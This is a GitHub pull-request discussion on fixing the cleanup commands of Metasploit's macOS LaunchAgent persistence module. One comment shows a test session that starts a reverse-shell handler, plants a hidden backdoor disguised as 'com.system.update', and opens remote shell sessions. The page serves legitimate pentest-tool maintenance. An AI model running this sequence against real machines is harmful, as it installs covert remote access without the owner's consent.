Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Update removal commands for osx/local/persistence #12871

Merged
merged 1 commit into from Jan 28, 2020
Merged

Conversation

@phra
Copy link
Contributor

phra commented Jan 21, 2020

fixes #12870

fixes #12870
@space-r7 space-r7 added the bug label Jan 21, 2020
@bcoles
bcoles approved these changes Jan 25, 2020
Copy link
Contributor

bcoles left a comment

Seems legit. LGTM

@timwr timwr self-assigned this Jan 28, 2020
@timwr

This comment has been minimized.

Copy link
Contributor

timwr commented Jan 28, 2020

These changes look OK but I'm not having much success with this module on Mojave:

  1. x64 isn't a payload option (not a blocker, but I suspect this is breaks Catalina: https://support.apple.com/en-vn/HT208436)
  2. Permission errors (although it's possible/likely I broke something on my machine):
Users-iMac:~ user$ launchctl load /Users/user/Library/LaunchAgents/com.system.update.plist
/Users/user/Library/LaunchAgents/com.system.update.plist: Operation not permitted
Users-iMac:~ user$ launchctl load -w /Users/user/Library/LaunchAgents/com.system.update.plist
/Users/user/Library/LaunchAgents/com.system.update.plist: Operation not permitted
Users-iMac:~ user$ sudo launchctl load -w /Users/user/Library/LaunchAgents/com.system.update.plist
Password:
/Users/user/Library/LaunchAgents/com.system.update.plist: Path had bad ownership/permissions
Users-iMac:~ user$ sudo launchctl load /Users/user/Library/LaunchAgents/com.system.update.plist
/Users/user/Library/LaunchAgents/com.system.update.plist: Path had bad ownership/permissions

I'll merge this and fix 1., and hopefully figure out what's going on with 2.

@timwr

This comment has been minimized.

Copy link
Contributor

timwr commented Jan 28, 2020

Despite 2. the module still appears to work once I reboot 🤷‍♂

@phra

This comment has been minimized.

Copy link
Contributor Author

phra commented Jan 28, 2020

AFAIK the load command only loads immediately the script but the persistence is achieved by writing the .plist itself.

timwr added a commit that referenced this pull request Jan 28, 2020
…ptions
@timwr timwr merged commit 06843d0 into rapid7:master Jan 28, 2020
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@timwr

This comment has been minimized.

Copy link
Contributor

timwr commented Jan 28, 2020

Please see: 0b0d4c8

  1. Added support for x64 payloads
  2. The removal commands now also deletes the payload directory (not just the payload).
  3. I added a launchctl remove that also deletes the plist from launchctl list (although I think rebooting also clears it).
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload osx/x86/shell_reverse_tcp
payload => osx/x86/shell_reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.13.37
LHOST => 192.168.13.37
msf5 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf5 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf5 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
msf5 exploit(multi/handler) >
[*] Started reverse TCP handler on 192.168.13.37:4444
[*] Command shell session 1 opened (192.168.13.37:4444 -> 192.168.133.37:49153) at 2020-01-28 17:34:28 +0800

msf5 exploit(multi/handler) > use exploit/osx/local/persistence
msf5 exploit(osx/local/persistence) > set payload osx/x86/shell_reverse_tcp
payload => osx/x86/shell_reverse_tcp
msf5 exploit(osx/local/persistence) > set LHOST 192.168.13.37
LHOST => 192.168.13.37
msf5 exploit(osx/local/persistence) > set LPORT 4444
LPORT => 4444
msf5 exploit(osx/local/persistence) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf5 exploit(osx/local/persistence) > set RUN_NOW true
RUN_NOW => true
msf5 exploit(osx/local/persistence) > set SESSION -1
SESSION => -1
msf5 exploit(osx/local/persistence) > run

[*] Dropping backdoor executable...
[+] Backdoor stored to /Users/user/Library/.vgzornHi/com.system.update
[+] LaunchAgent added: /Users/user/Library/LaunchAgents/com.system.update.plist
[+] LaunchAgent installed successfully.
[*] To remove the persistence, run:
rm -rf /Users/user/Library/.vgzornHi ; rm /Users/user/Library/LaunchAgents/com.system.update.plist ; launchctl remove com.system.update ; launchctl stop com.system.update

msf5 exploit(osx/local/persistence) > [*] Command shell session 2 opened (192.168.13.37:4444 -> 192.168.133.37:49154) at 2020-01-28 17:35:15 +0800

msf5 exploit(osx/local/persistence) > sessions 2
[*] Starting interaction with 2...

rm -rf /Users/user/Library/.vgzornHi ; rm /Users/user/Library/LaunchAgents/com.system.update.plist ; launchctl remove com.system.update ; launchctl stop com.system.update
[*] 192.168.133.37 - Command shell session 2 closed.
msf5 exploit(osx/local/persistence) > sessions 1
[*] Starting interaction with 1...

ls -ld /Users/user/Library/.*
drwx------@ 64 user  staff  2176 Jan 28 17:35 /Users/user/Library/.
drwxr-xr-x+ 87 user  staff  2958 Jan 28 16:19 /Users/user/Library/..
-rw-r--r--   1 user  staff     0 Mar  3  2018 /Users/user/Library/.localized
launchctl list | grep update
-       0       com.apple.softwareupdate_notify_agent
-       0       com.apple.appstoreupdateagent

Thanks @phra !!

@tperry-r7 tperry-r7 added the rn-fix label Feb 4, 2020
@tperry-r7

This comment has been minimized.

Copy link
Contributor

tperry-r7 commented Feb 4, 2020

Release Notes

Fixes module osx/local/persistence. Previously it suggested the wrong removal commands that prevented the deletion of the dropped executable.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Linked issues

Successfully merging this pull request may close these issues.

5 participants
You can’t perform that action at this time.